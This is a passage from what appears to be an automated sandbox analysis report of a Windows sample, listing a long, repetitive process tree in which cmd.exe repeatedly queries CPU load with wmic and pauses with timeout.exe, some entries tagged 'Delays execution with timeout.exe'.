    3⤵
    PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1228
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4500
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3244
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3784
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3808
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2148
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3804
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4696
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5096
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4024
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4112
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3276
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4272
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1832
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2136
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4996
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1328
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:60
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2280
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2992
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3300
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2028
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2292
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1688
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2136
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:60
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1416
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3372
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4916
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4640
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2264
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3736
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1992
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1920
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
